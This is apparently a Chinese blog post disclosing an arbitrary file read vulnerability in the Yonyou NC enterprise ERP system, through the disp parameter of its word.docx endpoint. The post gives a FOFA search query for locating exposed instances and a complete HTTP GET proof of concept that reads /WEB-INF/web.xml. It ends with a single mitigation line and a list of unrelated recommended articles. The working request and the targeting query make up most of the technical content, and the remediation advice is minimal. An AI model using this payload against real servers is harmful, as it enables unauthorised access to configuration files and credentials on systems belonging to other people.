用友NC word.docx任意文件读取漏洞

文章目录

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

python 复制代码
app="用友-UFIDA-NC"

漏洞利用

Poc:

python 复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

相关推荐
Johny_Zhao36 分钟前
2025年6月Docker镜像加速失效终极解决方案
linux·网络·网络安全·docker·信息安全·kubernetes·云计算·containerd·yum源·系统运维
痴人说梦梦中人6 小时前
SwaggerFuzzer:一款自动化 OpenAPI/Swagger 接口未授权访问测试工具
网络安全·渗透测试·自动化·api测试·漏洞利用·信息搜集
lubiii_7 小时前
SQL手工测试(MySQL数据库)
数据库·mysql·web安全·网络安全
网安INF11 小时前
ElGamal加密算法:离散对数难题的安全基石
java·网络安全·密码学
空中湖20 小时前
文档极速转换器 - 免费批量Word转PDF工具
pdf·word
网安INF20 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_20 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
李枫月1 天前
Server2003 B-1 Windows操作系统渗透
网络安全·环境解析·server2003
饮长安千年月1 天前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
东方佑1 天前
使用 Python 自动化 Word 文档样式复制与内容生成
python·自动化·word